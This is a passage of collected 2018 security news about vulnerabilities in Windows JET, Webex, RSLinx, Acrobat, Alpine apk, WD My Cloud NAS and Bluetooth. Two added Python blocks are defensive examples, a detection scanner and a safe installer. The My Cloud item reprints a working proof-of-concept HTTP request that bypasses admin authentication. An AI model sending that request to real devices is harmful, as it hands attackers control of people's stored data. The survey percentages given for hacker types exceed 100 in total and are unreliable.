
OLEDB (or OLE-DB) stands for Object Linking and Embedding, Database, an API from Microsoft that allows accessing data from a variety of sources in a uniform manner.

An attacker looking to trigger the vulnerability would need to trick the user into opening a specially crafted file that contains data stored in the JET database format. The database format is used by various applications and the attacker would be able to execute code at the level of the current process.

The vulnerability was confirmed in Windows 7, but ZDI, which also published proof-of-concept code, believes that all supported Windows versions are impacted, including server editions.

“Microsoft continues to work on a patch for this vulnerability, and we hope to see it in the regularly scheduled October patch release. In the absence of a patch, the only salient mitigation strategy is to exercise caution and not open files from untrusted sources,” Zuckerbraun concludes.

The zero-day flaw has a CVSS score of 6.8.


Expert disclosed an unpatched zero-day flaw in all supported versions of Microsoft Windows
23.9.2018 securityaffairs
Vulnerebility

A security researcher from Trend Micro Security Research team disclosed an unpatched zero-day vulnerability in all supported versions of Microsoft Windows.
The researcher Lucas Leong of the Trend Micro Security Research team publicly disclosed an unpatched zero-day vulnerability in all supported versions of Microsoft Windows.

The flaw is an out-of-bounds (OOB) write in the JET Database Engine that could be exploited by a remote attacker to execute arbitrary code on the vulnerable systems.

The zero-day vulnerability has received a CVSS score of 6.8 and resides in the management of indexes in JET. An attacker can use specially crafted data in a database file to trigger a write past the end of an allocated buffer.

Experts highlighted that exploitation of the flaw requires user interaction; the attackers have to trick victims into opening a malicious file that would trigger the bug.

The specially crafted file has to contain data stored in the JET database format.

The expert disclosed the flaw through Trend Micro’s Zero Day Initiative (ZDI) on Thursday; the issue affects the Microsoft JET Database Engine.

Lucas Leong reported the flaw to Microsoft in early May 2018 and expected it to be fixed in the September 2018 Patch Tuesday set of security updates, but Microsoft did not fix it.

“Today, we are releasing additional information regarding a bug report that has exceeded the 120-day disclosure timeline” reads the blog post published by ZDI.

“An out-of-bounds (OOB) write in the Microsoft JET Database Engine that could allow remote code execution was initially reported to Microsoft on May 8, 2018. An attacker could leverage this vulnerability to execute code under the context of the current process, however it does require user interaction since the target would need to open a malicious file. As of today, this bug remains unpatched.”

According to the ZDI’s disclosure policy, details on the vulnerability could be released 120 days after the vendor was notified on the issue, even if the flaw was still unpatched.

ZDI also published the proof-of-concept (PoC) exploit code for the vulnerability.


Microsoft confirmed the existence of the flaw in Windows 7, but experts at ZDI believe the issue affects all supported Windows versions.

“Our investigation has confirmed this vulnerability exists in Windows 7, but we believe that all supported Windows version are impacted by this bug, including server editions. You can view our advisory here.” ZDI concludes.

“Microsoft continues to work on a patch for this vulnerability, and we hope to see it in the regularly scheduled October patch release. In the absence of a patch, the only salient mitigation strategy is to exercise caution and not open files from untrusted sources.”


Cisco Patches Code Execution in Webex Player
22.9.2018 securityweek
Vulnerebility

Cisco this week addressed vulnerabilities in the Webex Network Recording Player for Advanced Recording Format (ARF) that could allow a remote attacker to execute arbitrary code on a targeted system.

The Webex Meetings Server is a multimedia conferencing solution that can be hosted on a customer’s private cloud and which manages and maintains the Webex Meetings Suite services and Webex Meetings Online hosted multimedia conferencing solutions.

The Meetings services can record meetings, with the recordings stored online or downloadable in ARF format. The meetings can also be recorded directly on a local computer, in WRF format.

The Network Recording Player can be installed either automatically when a user accesses a recording file hosted on a Webex Meetings Suite site or manually from the Webex site.

Improper validation of Webex recording files, however, was found to lead to vulnerabilities that an unauthenticated, remote attacker can exploit.

For exploitation purposes, the attacker would need to send a link or email attachment containing a malicious file to the victim and trick them into opening the file in the Cisco Webex Player.

The bugs, Cisco explains in an advisory, impact ARF recording players available from Meetings Suite (WBS32) - Player versions prior to WBS32.15.10; Meetings Suite (WBS33) - Player versions prior to WBS33.3; Webex Meetings Online - Player versions prior to 1.3.37; and Webex Meetings Server - Player versions prior to 3.0MR2.

The issues are tracked as CVE-2018-15414, CVE-2018-15421, and CVE-2018-15422. The Windows, OS X, and Linux versions of the Webex Network Recording Players are impacted by at least one of the flaws, Cisco reveals.

The Network Recording Player updates that resolve the vulnerabilities include Meetings Suite (WBS32) - Player versions WBS32.15.10 and later and Meetings Suite (WBS33) - Player versions WBS33.3 and later; Meetings Online - Player versions 1.3.37 and later; and Meetings Server - Player versions 3.0MR2 and later.

According to Cisco, there are no known workarounds for these vulnerabilities. However, users can remove the affected Network Recording Player and Webex Player by following the uninstall procedure for their respective operating systems.

“The Cisco Webex Network Recording Player (for .arf files) will be automatically upgraded to the latest, non-vulnerable version when users access a recording file that is hosted on a Cisco Webex Meetings site that contains the versions previously specified,” Cisco explains.


Rockwell Automation Patches Severe Flaws in Communications Software
22.9.2018 securityweek
Vulnerebility

Rockwell Automation has patched several critical and high severity vulnerabilities in its RSLinx Classic communications software.

RSLinx Classic is a widely used piece of software that allows organizations to connect Logix5000 programmable automation controllers to various Rockwell applications, including for data acquisition, programming, HMI interaction, and configuration apps. The product is used worldwide, mainly in the energy, critical manufacturing, and water and wastewater systems sectors.

According to advisories published recently by ICS-CERT and Rockwell Automation itself, researchers from Tenable and Nozomi discovered that RSLinx Classic is affected by three vulnerabilities that can allow malicious actors to launch denial-of-service (DoS) attacks, and possibly even execute arbitrary code.

The most serious of the flaws is CVE-2018-14829, a stack-based buffer overflow that has been assigned a CVSS score of 10. A remote attacker can cause the application to crash by sending specially crafted CIP packets on port 44818. Triggering the buffer overflow can also lead to remote code execution, Rockwell and ICS-CERT warned.

Another severe vulnerability is CVE-2018-14827, which has a CVSS score of 8.6 and allows a remote and unauthenticated attacker to crash the application by sending specially crafted Ethernet/IP packets to the aforementioned port. Rockwell noted that the software must be restarted by the user following a successful exploit.

The last vulnerability, also classified as high severity, with a CVSS score of 7.5, is a heap-based buffer overflow tracked as CVE-2018-14821. This security bug also allows a remote and unauthenticated attacker to crash the software using malicious CIP packets.

The flaws affect RSLinx Classic 4.00.01 and prior. Patches have been released by the vendor for each impacted version.

Users can also protect themselves against potential attacks by disabling port 44818, which is only needed in certain scenarios.

These are not the only serious vulnerabilities patched recently by Rockwell Automation in RSLinx Classic. A few months ago, the company and ICS-CERT informed users of a high severity privilege escalation issue that also affected the FactoryTalk Linx Gateway product.


Cisco fixes Remote Code Execution flaws in Webex Network Recording Player
21.9.2018 securityaffairs
Vulnerebility

Cisco released security patches to fix RCE flaws in the Webex Network Recording Player for Advanced Recording Format (ARF).
Cisco released security patches to address vulnerabilities in the Webex Network Recording Player for Advanced Recording Format (ARF) (CVE-2018-15414, CVE-2018-15421, and CVE-2018-15422) that could be exploited by an unauthenticated, remote attacker to execute arbitrary code on a vulnerable system.

The Webex Meetings Server is a collaboration and communications solution that can be deployed on a private cloud and which manages the Webex Meetings Suite services and Webex Meetings Online hosted multimedia conferencing solutions.

The Meetings services allow customers to record meetings and store them online or download them in ARF format, or to record them directly on a local computer in WRF format.

The corresponding Network Recording Player can be installed either automatically when a user accesses a recording file hosted on a Webex Meetings Suite site or manually by downloading it from the Webex site.

The lack of proper validation of Webex recording files is the root cause of the vulnerabilities, which could allow an unauthenticated, remote attacker to execute arbitrary code on the target machine.

“Multiple vulnerabilities in the Cisco Webex Network Recording Player for Advanced Recording Format (ARF) could allow an unauthenticated, remote attacker to execute arbitrary code on a targeted system.” reads the security advisory published by Cisco.

“The vulnerabilities are due to improper validation of Webex recording files. An attacker could exploit these vulnerabilities by sending a user a link or email attachment containing a malicious file and persuading the user to open the file in the Cisco Webex Player. A successful exploit could allow the attacker to execute arbitrary code on an affected system.”


An attacker could exploit the flaws by tricking victims into opening a malicious file in the Cisco Webex Player; the file could be sent as an email attachment or referenced through a link.

The vulnerabilities affect the following ARF recording players:

Cisco Webex Meetings Suite (WBS32) – Webex Network Recording Player versions prior to WBS32.15.10
Cisco Webex Meetings Suite (WBS33) – Webex Network Recording Player versions prior to WBS33.3
Cisco Webex Meetings Online – Webex Network Recording Player versions prior to 1.3.37
Cisco Webex Meetings Server – Webex Network Recording Player versions prior to 3.0MR2
Each version of the Webex Network Recording Players for Windows, OS X, and Linux is affected by at least one of the issues.

The following Network Recording Player updates address the vulnerabilities:

Meetings Suite (WBS32) – Player versions WBS32.15.10 and later
Meetings Suite (WBS33) – Player versions WBS33.3 and later
Meetings Online – Player versions 1.3.37 and later
Meetings Server – Player versions 3.0MR2 and later
Cisco warns that there are no known workarounds for these issues.

“The Cisco Webex Network Recording Player (for .arf files) will be automatically upgraded to the latest, non-vulnerable version when users access a recording file that is hosted on a Cisco Webex Meetings site that contains the versions previously specified,” concludes the Cisco advisory.


Adobe Patches Code Execution, Other Flaws in Acrobat and Reader
20.9.2018 securityweek
Vulnerebility

Updates released on Wednesday by Adobe for the Windows and macOS versions of Acrobat and Reader address a total of 7 vulnerabilities, including a critical flaw that can allow arbitrary code execution.

The security holes affect Acrobat DC and Acrobat Reader DC (continuous track) 2018.011.20058 and earlier versions; Acrobat 2017 and Acrobat Reader 2017 (classic 2017 track) 2017.011.30099 and earlier versions; and Acrobat DC and Acrobat Reader DC (classic 2015 track) 2015.006.30448 and earlier versions.

The most serious of the flaws, tracked as CVE-2018-12848 and classified as “critical,” is an out-of-bounds write issue that allows arbitrary code execution. This was one of the four vulnerabilities reported to Adobe by Omri Herscovici, research team leader at Check Point Software Technologies.

The other bugs have been described by Adobe as out-of-bounds read issues that can lead to information disclosure. These have been assigned an “important” severity rating.

Cybellum Technologies reported one of the flaws and an anonymous researcher informed Adobe of two flaws via Trend Micro’s Zero Day Initiative (ZDI).

Adobe is not aware of any malicious exploitation and, based on the priority rating assigned to the patches, it does not expect to see exploits any time soon.

The Acrobat and Reader patches come just one week after Adobe released its regular Patch Tuesday updates for September 2018, which resolved 10 vulnerabilities in Flash Player and ColdFusion.

Adobe also released an update for Photoshop CC recently to patch two critical remote code execution vulnerabilities.


Patching Not Enough; Organizations Must Adopt Zero-Trust Practices: Report
20.9.2018 securityweek
Vulnerebility

Hackers Can Gain Network Access Via Social Engineering and Wait for New Zero-Day Exploits to Elevate Their Privilege

At Black Hat 2017, privileged access firm Thycotic surveyed 250 hackers to find out what was easy and what was hard about hacking into networks. At this year's Black Hat, it conducted a similar survey (PDF) among 300 people that consider themselves hackers.

"This year," Thycotic's chief security scientist Joseph Carson told SecurityWeek, "we also wanted to better understand the types of hacker that exist, and their motives for doing what they do."

The respondents self-identified as three groups that could traditionally be described as white hat (70%), grey hat (30%) and black hat (5%). The white hats describe themselves as 'ethical' hackers -- they use their skills and knowledge for good purposes. "There's another category -- which is also ethical -- but where they admit to crossing the line," said Carson. "Their motivation is still to benefit the community; but they admit that some of their practices may actually be illegal."

These tend to be independent researchers, and their work is often unrecognized, because, said Carson, "they tend to report their findings through anonymous channels."

And then there are the black hats -- those who hack for illegal purposes and for personal gain. Only 5% of the respondents admitted to this; but none of them are likely to be full-time criminals. Law enforcement agencies always monitor Black Hat; and 'unemployed' attendees are of particular interest.

The 5% black hats are likely to have legitimate day jobs, and may well have been sent to Black Hat by their employer. It tends to confirm the findings of Malwarebytes this summer -- many companies have one or two employees who moonlight to the dark side.

"Another area we wanted to examine," Carson told SecurityWeek, "is whether staying up to date with the latest software is any protection against hackers." Specifically, Thycotic wanted to know whether current OSs are easily compromised, and asked the question, 'Which OS did you conquer the most in the past 12 months?'.

"What was really surprising," said Carson, "was that Windows 10 -- even though it is the latest and most secure operating system from Microsoft -- is still easily exploitable by hackers. More than one-third of the compromised OSs were Windows 8 and 10. It goes against the common viewpoint that having the latest fully patched system will keep you secure. You have to accept that being patched and up to date is not enough on its own."

The most common method of hacking used by the respondents (56.03%) is social engineering -- it's easier and a lot cheaper than using a zero-day exploit. "Hackers confirmed that 50% of their exploits have uncovered employees re-using passwords that have been already exposed in other data breaches, giving hackers an easy way onto the network," notes the report.

It is clear that users still do not understand the weaknesses in passwords. "A strong password isn't just a lot of jumbled characters," said Carson. "Before it can be considered strong, a password must combine three separate characteristics: it must be complex, unique, and not already compromised elsewhere."

"One thing we did notice," Carson told SecurityWeek, "is that using social engineering doesn't automatically give the hacker privileged access and full network control. Hackers gain access and then wait for the arrival of new zero-day exploits that allow them to elevate their privilege."

Carson pointed out that one such Windows 10 zero-day was disclosed a few weeks ago. "This likely means that over the past couple of weeks many companies that had a simple unprivileged account breach now have the potential for a major compromise occurring within their networks. Social engineering allows attackers to get one foot in the door and then they wait for either misconfiguration or a new vulnerability that they can easily exploit to move to the next level."

These two findings from the hacker respondents -- that patching doesn't prevent hacking, and that most hacks come through social engineering -- are key to Carson's primary conclusion: organizations need to adopt zero-trust practices. "We learnt from last year's study that least privilege and multi-factor authentication make life difficult for hackers," Carson told SecurityWeek.

"We learn this year that 75% of companies have still not adopted this approach despite its effectiveness." Zero trust implies the automatic assumption that an account has been compromised, and requires multi-factor authentication to prove otherwise. This is applied both when moving from the internet to the corporate network, and from one segment of the corporate network to another segment.

"The combination of least privilege and zero trust will make life too difficult for the hackers, and they will likely give up and move on to easier targets," said Carson. Those hackers who have socially engineered a low privilege account and are waiting for a privilege escalation zero day will find they have to break in again before they can do everything.

"Every time the criminal returns to the network he is challenged again and has to use multiple and more sophisticated methods to continue the attack," said Carson. "Combining the principles of least privilege and zero trust is not 100% protection, but it is a major deterrence against everyday hacking."


Adobe issued a critical out-of-band patch to address CVE-2018-12848 Acrobat flaw
20.9.2018 securityaffairs
Vulnerebility

Adobe released a critical out-of-band patch for the CVE-2018-12848 Acrobat flaw; the security updates address a total of 7 vulnerabilities.
Adobe addressed seven vulnerabilities in Acrobat DC and Acrobat Reader DC, including one critical vulnerability that could be exploited by attackers to execute arbitrary code.

“Adobe has released security updates for Adobe Acrobat and Reader for Windows and MacOS. These updates address critical and important vulnerabilities. Successful exploitation could lead to arbitrary code execution in the context of the current user.” reads the security advisory.

The flaws affect Acrobat DC and Acrobat Reader DC for Windows and macOS (versions 2018.011.20058 and earlier); Acrobat 2017 and Acrobat Reader 2017 for Windows and macOS (versions 2017.011.30099 and earlier); and Acrobat DC and Acrobat Reader DC for Windows and macOS (versions 2015.006.30448 and earlier).

The security patches have been released just one week after Adobe released its Patch Tuesday updates for September 2018 that addressed 10 vulnerabilities in Flash Player and ColdFusion.

The most severe flaw, tracked as CVE-2018-12848, is a critical out-of-bounds write issue that could allow arbitrary code execution.

The flaw was reported by Omri Herscovici, research team leader at Check Point Software Technologies; the expert also found three other vulnerabilities.

The remaining flaws are out-of-bounds read vulnerabilities (CVE-2018-12849, CVE-2018-12850, CVE-2018-12801, CVE-2018-12840, CVE-2018-12778, CVE-2018-12775) that are rated as “important” and could lead to information disclosure.

The CVE-2018-12778 and CVE-2018-12775 vulnerabilities were anonymously reported via Trend Micro’s Zero Day Initiative, while the CVE-2018-12801 issue was discovered by experts at Cybellum Technologies LTD.

The good news is that Adobe is not aware of any malicious exploitation of the flaw in attacks.


A flaw in Alpine Linux could allow executing arbitrary code
19.9.2018 securityaffairs
Vulnerebility

Security researcher Max Justicz has discovered several flaws in the Alpine Linux distribution, including an arbitrary code execution issue.
Alpine Linux is an independent, non-commercial, general purpose Linux distribution that is heavily used in containers, including Docker.

Alpine Linux is based on musl libc and busybox; it is a tiny distro optimized for low resource usage and is also known for fast boot times.

The expert discovered several vulnerabilities in APK, the default package manager in Alpine. The most severe bug found by Max Justicz could be exploited by an attacker in a man-in-the-middle position to execute arbitrary code on the user’s machine.

“I found several bugs in apk, the default package manager for Alpine Linux. Alpine is a really lightweight distro that is very commonly used with Docker.” states the analysis published by the researcher.

“The worst of these bugs, the subject of this blog post, allows a network man-in-the-middle (or a malicious package mirror) to execute arbitrary code on the user’s machine. This is especially bad because packages aren’t served over TLS when using the default repositories.”

An attacker could trigger the flaw to target a Docker container based on Alpine and execute arbitrary code; Justicz also published a video PoC of the attack.

The package manager extracts packages, distributed as apks in the form of gzipped tar archives, and only afterwards checks their hashes against the ones in the signed manifest.

If the hashes are different, the package manager attempts to unlink all of the extracted files and directories.

The expert highlighted that APK’s commit hooks feature could allow an attacker to turn persistent arbitrary file writes into code execution. Justicz discovered that it is possible to hide malware within the package’s commit_hooks directory so that it escapes the cleanup and is then executed as normal.

The expert explained that if an attacker is able to extract a file into /etc/apk/commit_hooks.d/ and have it stay there after the cleanup process, it will be executed before apk exits.

The attacker has to control the downloaded tar file and prevent the package manager from unlinking the payload and its directory during the cleanup process.

The expert explained that the attacker can run MitM to intercept apk’s package requests during Docker image building, then inject them with malicious code before they are passed to the target machines that would unpack and run the malicious code within their Docker container.

The latest Alpine version has addressed the issue; developers are recommended to rebuild their Docker images with the updated Alpine build.


Flaw in Western Digital My Cloud exposes the content to hackers
19.9.2018 securityaffairs
Vulnerebility

An authentication bypass vulnerability in Western Digital My Cloud NAS could allow hackers to access the content of the storage.
Researchers at security firm Securify have discovered an elevation of privilege vulnerability in the Western Digital My Cloud platform that could be exploited by attackers to gain admin-level access to the device via an HTTP request.

The flaw, tracked as CVE-2018-17153, would allow an unauthenticated attacker with network access to the device to authenticate as an admin without providing a password.

The attacker could exploit the flaw to run commands, access the stored data, modify/copy them as well as wipe the NAS.

“It was discovered that the Western Digital My Cloud is affected by an authentication bypass vulnerability that allows an unauthenticated user to create an admin session that is tied to her IP address.” reads the report published by Securify.

“By exploiting this issue an unauthenticated attacker can run commands that would normally require admin privileges and gain complete control of the My Cloud device.”

The vulnerability resides in the way My Cloud devices create admin sessions, which are bound to the user’s IP address.

Once the session is created, it is possible to call the authenticated CGI modules by sending the cookie username=admin in the HTTP request. The CGI will check if a valid session is present and bound to the user’s IP address.

An attacker can send a CGI call to the device that includes the cookie username=admin.

“It was found that it is possible for an unauthenticated attacker to create a valid session without requiring to authenticate.” continues Securify.

“The network_mgr.cgi CGI module contains a command called cgi_get_ipv6 that starts an admin session that is tied to the IP address of the user making the request when invoked with the parameter flag equal to 1. Subsequent invocation of commands that would normally require admin privileges are now authorized if an attacker sets the username=admin cookie.”


The experts published the following PoC code to exploit the issue:

POST /cgi-bin/network_mgr.cgi HTTP/1.1
Host: wdmycloud.local
Content-Type: application/x-www-form-urlencoded
Cookie: username=admin
Content-Length: 23

cmd=cgi_get_ipv6&flag=1

Securify reported the vulnerability to Western Digital in April, but it is still waiting for a response.

In February, experts from Trustwave disclosed two vulnerabilities in Western Digital My Cloud network storage devices that could be exploited by a local attacker to gain root access to the NAS devices.

In April, security experts at Trustwave discovered that Western Digital My Cloud EX2 storage devices were leaking files on a local network by default.
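The PoC request above is the pattern a proxy or network sensor in front of a My Cloud device can look for. The following is an added Python example, not Securify’s or Western Digital’s code: it parses raw HTTP requests and flags a network_mgr.cgi call carrying cmd=cgi_get_ipv6 with flag=1, whether the parameters arrive in a POST body (as in the PoC) or in a query string. The sample requests, including the benign ones, are constructed for this example.

```python
from urllib.parse import parse_qs, urlsplit

VULN_CGI = "/cgi-bin/network_mgr.cgi"


def parse_http_request(raw: str) -> dict:
    """Split a raw HTTP/1.1 request into method, path, merged params and cookies."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    url = urlsplit(target)
    params = parse_qs(url.query)
    # a form-encoded POST body carries the same cmd/flag parameters as a query string
    if method == "POST" and headers.get("content-type", "").startswith(
            "application/x-www-form-urlencoded"):
        for key, values in parse_qs(body.strip()).items():
            params.setdefault(key, []).extend(values)
    cookies = {}
    for part in headers.get("cookie", "").split(";"):
        key, _, value = part.strip().partition("=")
        if key:
            cookies[key] = value
    return {"method": method, "path": url.path, "params": params, "cookies": cookies}


def is_session_bypass_attempt(req: dict) -> bool:
    """Match the cgi_get_ipv6 call with flag=1 that creates an IP-bound admin session."""
    return (req["path"] == VULN_CGI
            and req["params"].get("cmd") == ["cgi_get_ipv6"]
            and req["params"].get("flag") == ["1"])


def scan_requests(raw_requests) -> list:
    """One finding per matching request; records whether the username=admin cookie was sent."""
    findings = []
    for i, raw in enumerate(raw_requests):
        req = parse_http_request(raw)
        if is_session_bypass_attempt(req):
            findings.append({"index": i, "method": req["method"],
                             "admin_cookie": req["cookies"].get("username") == "admin"})
    return findings


# Constructed samples: [0] has the shape of the published PoC, [1] is an unrelated
# CGI call (hypothetical command), [2] the same command with a hypothetical flag=0,
# [3] the trigger parameters sent in a GET query string instead of a POST body.
SAMPLE_REQUESTS = [
    "\r\n".join([
        "POST /cgi-bin/network_mgr.cgi HTTP/1.1",
        "Host: wdmycloud.local",
        "Content-Type: application/x-www-form-urlencoded",
        "Cookie: username=admin",
        "Content-Length: 23",
        "",
        "cmd=cgi_get_ipv6&flag=1",
    ]),
    "\r\n".join([
        "GET /cgi-bin/home_mgr.cgi?cmd=cgi_get_version HTTP/1.1",
        "Host: wdmycloud.local",
        "",
        "",
    ]),
    "\r\n".join([
        "POST /cgi-bin/network_mgr.cgi HTTP/1.1",
        "Host: wdmycloud.local",
        "Content-Type: application/x-www-form-urlencoded",
        "Content-Length: 23",
        "",
        "cmd=cgi_get_ipv6&flag=0",
    ]),
    "\r\n".join([
        "GET /cgi-bin/network_mgr.cgi?cmd=cgi_get_ipv6&flag=1 HTTP/1.1",
        "Host: wdmycloud.local",
        "",
        "",
    ]),
]

if __name__ == "__main__":
    for finding in scan_requests(SAMPLE_REQUESTS):
        print(finding)
```

A hit from an address that never completed a password login is the signal worth alerting on; the admin cookie on its own is not, since legitimate sessions send it too.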


Code Execution in Alpine Linux Impacts Containers
18.9.2018 securityweek
Vulnerebility

A security researcher discovered several vulnerabilities in Alpine Linux, a distribution commonly used with Docker, including one that could allow for arbitrary code execution.

Based on musl and BusyBox, the Alpine Linux distribution has a small size and is heavily used in containers, including Docker, as it provides fast boot times.

APK, the default package manager in Alpine, is impacted by several bugs, security researcher Max Justicz has discovered. The most important of them, the researcher says, could allow a network man-in-the-middle (or a malicious package mirror) to execute arbitrary code on the user’s machine.

“This is especially bad because packages aren’t served over TLS when using the default repositories,” Justicz notes.

An attacker could target a Docker container based on Alpine for code execution, the security researcher reveals. Justicz also published a video detailing such an attack.

The issue, the researcher explains, is that the package manager extracts packages (which are gzipped tar files distributed as apks) before checking their hashes. If the downloaded package’s hash doesn’t match, the APK then attempts to unlink all extracted files and directories.

The APK’s commit hooks feature allows an attacker to turn persistent arbitrary file writes into code execution, as long as the files survive the cleanup process. Thus, the files are executed before apk exits.

For that, the attacker needs to be in control of the downloaded tar file and ensure that the APK won’t be able to unlink the payload and its directory during the cleanup process.

The next step is to make the APK process exit successfully, which requires the return of exit code 0. Normally, it “will return an exit code equal to the number of packages it has failed to install, which is now at least one,” the researcher explains.

However, the value can overflow and, if the number of errors % 256 == 0, the process returns exit code 0, meaning the attack was successful. The researcher was also able to write shellcode to exit(0) directly into memory and have it executed.

The bug likely impacts all those who use Alpine Linux in a production environment. All Alpine-derived container images should be rebuilt to eliminate the issue, the researcher points out.

Alpine Linux, the researcher says, is used by probably hundreds of organizations, all of which could have been affected by this bug.

“Some of those organizations almost certainly have bug bounty programs that would pay generously if a similar bug had been written by one of their own developers. If the goal of a bug bounty program is to help secure an organization, shouldn’t critical bugs in dependencies qualify to some extent?” Justicz concludes.
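Both Alpine articles above describe the same two defects: the archive is extracted before its hash is checked, and a failure count used as the exit code wraps to 0 at 256. The following is an added Python example, not apk’s own code, showing the ordering an installer should use instead (hash the downloaded bytes and vet member paths before anything is written, so there is no cleanup step for a planted file to survive) beside the exit-status clamping that keeps a failure count from reading as success. All archives, file names and paths are constructed for the example.

```python
import hashlib
import hmac
import io
import os
import tarfile
import tempfile

HASH_MISMATCH = "hash mismatch"


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def verify_package(archive_bytes: bytes, expected_sha256: str) -> bool:
    """True only if the whole downloaded archive hashes to the manifest value."""
    return hmac.compare_digest(sha256_hex(archive_bytes), expected_sha256.lower())


def unsafe_members(tar: tarfile.TarFile) -> list:
    """Names of members that must never be written: path escapes, links, devices."""
    bad = []
    for m in tar.getmembers():
        p = os.path.normpath(m.name)
        escapes = p.startswith("/") or p == ".." or p.startswith("../")
        if escapes or not (m.isfile() or m.isdir()):
            bad.append(m.name)
    return bad


def install_package(archive_bytes: bytes, expected_sha256: str, dest_dir: str) -> list:
    """Verify first, extract second; nothing touches dest_dir until both checks pass.

    Raises ValueError on a hash mismatch or an unsafe member path, so there is
    no post-extraction cleanup in which a planted file could be left behind.
    """
    if not verify_package(archive_bytes, expected_sha256):
        raise ValueError(HASH_MISMATCH)
    with tarfile.open(fileobj=io.BytesIO(archive_bytes), mode="r:gz") as tar:
        bad = unsafe_members(tar)
        if bad:
            raise ValueError(f"unsafe member paths: {bad}")
        written = []
        for m in tar.getmembers():
            target = os.path.join(dest_dir, os.path.normpath(m.name))
            if m.isdir():
                os.makedirs(target, exist_ok=True)
            else:
                os.makedirs(os.path.dirname(target), exist_ok=True)
                with open(target, "wb") as f:
                    f.write(tar.extractfile(m).read())
                written.append(m.name)
        return written


def truncated_exit_status(failed_packages: int) -> int:
    """What a caller sees when a failure count is used directly as the exit code:
    only the low 8 bits survive, so 256 failed packages read as success (0)."""
    return failed_packages % 256


def exit_status(failed_packages: int) -> int:
    """Clamped alternative: any failure at all is reported as 1."""
    return 0 if failed_packages == 0 else 1


def build_archive(files: dict) -> bytes:
    """Build a gzipped tar in memory (constructed fixture, not a real apk)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, data in files.items():
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def run_demo() -> dict:
    """Exercise the checks on constructed archives and return the outcomes."""
    dest = tempfile.mkdtemp()
    out = {}
    good = build_archive({"bin/tool": b"#!/bin/sh\necho ok\n", "etc/tool.conf": b"x=1\n"})
    out["installed"] = sorted(install_package(good, sha256_hex(good), dest))
    with open(os.path.join(dest, "etc", "tool.conf"), "rb") as f:
        out["content"] = f.read()
    try:  # same archive, but the manifest hash does not match
        install_package(good, "0" * 64, dest)
        out["mismatch"] = None
    except ValueError as e:
        out["mismatch"] = str(e)
    bad = build_archive({"../escape.sh": b"x"})  # member path outside dest_dir
    try:
        install_package(bad, sha256_hex(bad), dest)
        out["escape"] = None
    except ValueError as e:
        out["escape"] = str(e)
    return out
```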


One year after the BlueBorne disclosure, over 2 billion devices are still vulnerable
17.9.2018 securityaffairs
Vulnerebility

One year after the discovery of the BlueBorne Bluetooth vulnerabilities more than 2 billion devices are still vulnerable to attacks.
In September 2017, experts with Armis Labs devised a new attack technique, dubbed BlueBorne, aimed at mobile, desktop and IoT devices that use Bluetooth. The BlueBorne attack exposes devices to a new remote attack that needs no user interaction and no pairing; the only condition for BlueBorne attacks is that targeted systems must have Bluetooth enabled.

The attack technique leverages a total of nine vulnerabilities in Bluetooth implementations that expose devices to cyber attacks.

A hacker in range of the targeted device can trigger one of the Bluetooth implementation issues for malicious purposes, including remote code execution and man-in-the-middle (MitM) attacks. The attacker only needs to determine the operating system running on the targeted device in order to use the correct exploit.

According to the experts, in order to launch a BlueBorne attack, it is not necessary to trick the victim into clicking on a link or opening a malicious file.

The attack is stealthy and victims will not notice any suspicious activity on their device.


Two months later, experts at Armis also revealed that millions of AI-based voice-activated personal assistants, including Google Home and Amazon Echo, were affected by the Blueborne flaws.

At the time of BlueBorne disclosure, Armis estimated that the security flaw initially affected roughly 5.3 billion Bluetooth-enabled devices.

One year later, the company published a new report warning that roughly one-third of the 5.3 billion impacted devices are still vulnerable to cyber attacks.

“Today, about two-thirds of previously affected devices have received updates that protect them from becoming victims of a BlueBorne attack, but what about the rest? Most of these devices are nearly one billion active Android and iOS devices that are end-of-life or end-of-support and won’t receive critical updates that patch and protect them from a BlueBorne attack.” states the new report published by Armis.

“The other 768 million devices are still running unpatched or unpatchable versions of Linux on a variety of devices from servers and smartwatches to medical devices and industrial equipment.

768 million devices running Linux
734 million devices running Android 5.1 (Lollipop) and earlier
261 million devices running Android 6 (Marshmallow) and earlier
200 million devices running affected versions of Windows
50 million devices running iOS version 9.3.5 and earlier”
It is disconcerting that one billion devices are still running a version of Android that no longer receives security updates, including Android 5.1 Lollipop and earlier (734 million), and Android 6 Marshmallow and earlier (261 million).

It is interesting to note that 768 million Linux devices are running an unpatched or unpatchable version; they include servers, industrial equipment, and IoT systems in many industries.

“An inherent lack of visibility hampers most enterprise security tools today, making it impossible for organizations to know if affected devices connect to their networks,” continues the report published by Armis.

“Whether they’re brought in by employees and contractors, or by guests using enterprise networks for temporary connectivity, these devices can expose enterprises to significant risks.”

Armis notified vendors of its findings five months ago, but the situation has not changed.

“As vulnerabilities and threats are discovered, it can take weeks, months, or more to patch them. Between the time Armis notified affected vendors about BlueBorne and its public disclosure, five months had elapsed. During that time, Armis worked with these vendors to develop fixes that could then be made available to partners or end-users.” added Armis.

Unmanaged and IoT devices are growing exponentially in the enterprise, dramatically enlarging the attack surface and attracting the interest of hackers focused on exploiting Bluetooth as an attack vector.


ICS-CERT warns of several flaws in Fuji Electric V-Server
13.9.2018 securityaffairs ICS 
Vulnerebility

Experts discovered several flaws in Fuji Electric V-Server, a tool that connects PCs within the organizations to Industrial Control Systems (ICS).
Experts discovered several vulnerabilities in Fuji Electric V-Server, a tool that connects PCs within the organizations to Industrial Control Systems (ICS) on the corporate network. The ICS-CERT published two advisories to warn of the existence of the flaws that could have a severe impact on a broad range of companies in the critical manufacturing sector.


The vulnerabilities, rated as “high severity,” could be exploited by a remote attacker to execute arbitrary code. Issues of this kind in products that control ICS systems are very dangerous and pose a severe threat to companies; the security of these products is essential to avoid ugly surprises.

Vulnerabilities affecting products that connect the corporate network to industrial control systems (ICS) can pose a serious threat since that is how many threat actors attempt to make their way onto sensitive systems.

Fuji Electric V-Server provides access to programmable logic controllers (PLCs) on the corporate network via Ethernet. The PLCs are controlled via the Monitouch human-machine interfaces (HMI).


